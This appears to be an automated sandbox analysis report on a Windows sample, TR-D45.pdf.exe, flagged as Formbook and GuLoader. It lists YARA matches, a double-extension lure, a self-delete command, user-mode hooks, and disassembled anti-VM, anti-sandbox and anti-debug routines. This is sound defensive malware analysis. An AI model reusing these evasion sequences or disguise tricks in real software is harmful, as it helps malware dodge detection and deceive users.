      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@8/3
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DF02231C1D730B1CDB.TMPJump to behavior
      Source: TR-D45.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: TR-D45.pdf.exeVirustotal: Detection: 29%
      Source: TR-D45.pdf.exeReversingLabs: Detection: 14%
      Source: unknownProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.292398447.00000000070D0000.00000002.00000001.sdmp
      Source: Binary string: control.pdb source: TR-D45.pdf.exe
      Source: Binary string: wntdll.pdbUGP source: TR-D45.pdf.exe, 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, control.exe, 0000000C.00000003.314263718.00000000040E0000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: TR-D45.pdf.exe, control.exe
      Source: Binary string: control.pdbUGP source: TR-D45.pdf.exe, 00000001.00000002.314034549.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.292398447.00000000070D0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 6060, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY
      Source: Yara match | File source: Process Memory Space: TR-D45.pdf.exe PID: 6060, type: MEMORY
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_004114BC push eax; ret 0_2_004114FB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02395BD8 push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239497F push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02394954 push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023949AB push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023949DF push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_3_0091C611 push ecx; ret 1_3_0091C624
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_3_00930BDE push ebx; iretd 1_3_00930C81
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2BD0D1 push ecx; ret 1_2_1E2BD0E4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_000B7811 push cs; retf 1_2_000B7819
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_000BDA6C push edi; ret 1_2_000BDA6E
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0448D0D1 push ecx; ret 12_2_0448D0E4
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245DA6C push edi; ret 12_2_0245DA6E
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_024563C0 pushad ; retf 12_2_02456460
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_02457811 push cs; retf 12_2_02457819
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CEE2 push eax; ret 12_2_0245CEE8
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CEEB push eax; ret 12_2_0245CF52
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CE95 push eax; ret 12_2_0245CEE8
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245CF4C push eax; ret 12_2_0245CF52
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_02456437 pushad ; retf 12_2_02456460
      Source: C:\Windows\SysWOW64\control.exe | Code function: 12_2_0245E4B2 push cs; retf 12_2_0245E4B3

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEB
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.exe | Static PE information: TR-D45.pdf.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390A92 NtSetInformationThread, TerminateProcess, 0_2_02390A92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390BAE TerminateProcess, 0_2_02390BAE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390AC7 TerminateProcess, 0_2_02390AC7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390B37 TerminateProcess, 0_2_02390B37
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390B9C TerminateProcess, 0_2_02390B9C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390B83 TerminateProcess, 0_2_02390B83
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390BD3 TerminateProcess, 0_2_02390BD3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390C27 TerminateProcess, 0_2_02390C27
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02390C67 TerminateProcess, 0_2_02390C67
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000023980C6 second address: 00000000023980C6 | instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FF010BA7BE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f fnop 0x00000021 add edi, edx 0x00000023 dec dword ptr [ebp+000000F8h] 0x00000029 jmp 00007FF010BA7C0Eh 0x0000002b cmp ecx, BDD4905Dh 0x00000031 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000038 jne 00007FF010BA7B93h 0x0000003a cmp bx, bx 0x0000003d call 00007FF010BA7C42h 0x00000042 call 00007FF010BA7BFAh 0x00000047 lfence 0x0000004a mov edx, dword ptr [7FFE0014h] 0x00000050 lfence 0x00000053 ret 0x00000054 mov esi, edx 0x00000056 pushad 0x00000057 rdtsc
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: TR-D45.pdf.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000023980C6 second address: 00000000023980C6 | instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FF010BA7BE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f fnop 0x00000021 add edi, edx 0x00000023 dec dword ptr [ebp+000000F8h] 0x00000029 jmp 00007FF010BA7C0Eh 0x0000002b cmp ecx, BDD4905Dh 0x00000031 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000038 jne 00007FF010BA7B93h 0x0000003a cmp bx, bx 0x0000003d call 00007FF010BA7C42h 0x00000042 call 00007FF010BA7BFAh 0x00000047 lfence 0x0000004a mov edx, dword ptr [7FFE0014h] 0x00000050 lfence 0x00000053 ret 0x00000054 mov esi, edx 0x00000056 pushad 0x00000057 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000023980E8 second address: 00000000023980E8 | instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 0000000002390F1B second address: 0000000002399812 | instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000005680E8 second address: 00000000005680E8 | instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 0000000000560F1B second address: 0000000000569812 | instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA | instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 | instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000024498E4 second address: 00000000024498EA | instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 0000000002449B5E second address: 0000000002449B64 | instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe TID: 6656 | Thread sleep count: 192 > 30
      Source: C:\Windows\explorer.exe TID: 4860 | Thread sleep time: -54000s >= -30000s
      Source: C:\Windows\SysWOW64\control.exe TID: 6664 | Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsers\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db@
      Source: explorer.exe, 00000005.00000000.296937352.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000005.00000000.281354355.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000005.00000000.282007162.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmp | Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000002.495706634.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: TR-D45.pdf.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW@%
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_0239071B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000 | 0_2_0239071B
Hides threads from debuggers
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02399799 rdtsc | 0_2_02399799
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02395737 LdrInitializeThunk | 0_2_02395737
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023989D5 mov eax, dword ptr fs:[00000030h] | 0_2_023989D5
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02392372 mov eax, dword ptr fs:[00000030h] | 0_2_02392372
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023941DF mov eax, dword ptr fs:[00000030h] | 0_2_023941DF
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02398A59 mov eax, dword ptr fs:[00000030h] | 0_2_02398A59
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02398A97 mov eax, dword ptr fs:[00000030h] | 0_2_02398A97
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02398B37 mov eax, dword ptr fs:[00000030h] | 0_2_02398B37
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02398B03 mov eax, dword ptr fs:[00000030h] | 0_2_02398B03
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02392B41 mov eax, dword ptr fs:[00000030h] | 0_2_02392B41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02397BBE mov eax, dword ptr fs:[00000030h] | 0_2_02397BBE
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_023989FF mov eax, dword ptr fs:[00000030h] | 0_2_023989FF
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02392F3B mov eax, dword ptr fs:[00000030h] | 0_2_02392F3B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02392F0A mov eax, dword ptr fs:[00000030h] | 0_2_02392F0A
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02392F8B mov eax, dword ptr fs:[00000030h] | 0_2_02392F8B
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02396D27 mov eax, dword ptr fs:[00000030h] | 0_2_02396D27
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 0_2_02396D4F mov eax, dword ptr fs:[00000030h] | 0_2_02396D4F
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E26E620 mov eax, dword ptr fs:[00000030h] | 1_2_1E26E620
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E31FE3F mov eax, dword ptr fs:[00000030h] | 1_2_1E31FE3F
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h] | 1_2_1E26C600
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h] | 1_2_1E26C600
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h] | 1_2_1E26C600
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E298E00 mov eax, dword ptr fs:[00000030h] | 1_2_1E298E00
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h] | 1_2_1E29A61C
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h] | 1_2_1E29A61C
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E321608 mov eax, dword ptr fs:[00000030h] | 1_2_1E321608
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E27766D mov eax, dword ptr fs:[00000030h] | 1_2_1E27766D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] | 1_2_1E28AE73
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] | 1_2_1E28AE73
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] | 1_2_1E28AE73
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] | 1_2_1E28AE73
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h] | 1_2_1E28AE73
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] | 1_2_1E277E41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] | 1_2_1E277E41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] | 1_2_1E277E41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] | 1_2_1E277E41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] | 1_2_1E277E41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h] | 1_2_1E277E41
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h] | 1_2_1E32AE44
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h] | 1_2_1E32AE44
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2E46A7 mov eax, dword ptr fs:[00000030h] | 1_2_1E2E46A7
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h] | 1_2_1E330EA5
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h] | 1_2_1E330EA5
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h] | 1_2_1E330EA5
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2FFE87 mov eax, dword ptr fs:[00000030h] | 1_2_1E2FFE87
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2776E2 mov eax, dword ptr fs:[00000030h] | 1_2_1E2776E2
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2916E0 mov ecx, dword ptr fs:[00000030h] | 1_2_1E2916E0
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E338ED6 mov eax, dword ptr fs:[00000030h] | 1_2_1E338ED6
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2936CC mov eax, dword ptr fs:[00000030h] | 1_2_1E2936CC
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2A8EC7 mov eax, dword ptr fs:[00000030h] | 1_2_1E2A8EC7
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E31FEC0 mov eax, dword ptr fs:[00000030h] | 1_2_1E31FEC0
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h] | 1_2_1E264F2E
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h] | 1_2_1E264F2E
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29E730 mov eax, dword ptr fs:[00000030h] | 1_2_1E29E730
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h] | 1_2_1E29A70E
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h] | 1_2_1E29A70E
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h] | 1_2_1E33070D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h] | 1_2_1E33070D
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E28F716 mov eax, dword ptr fs:[00000030h] | 1_2_1E28F716
Source: C:\Users\user\Desktop\TR-D45.pdf.exe | Code function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h] | 1_2_1E2FFF10
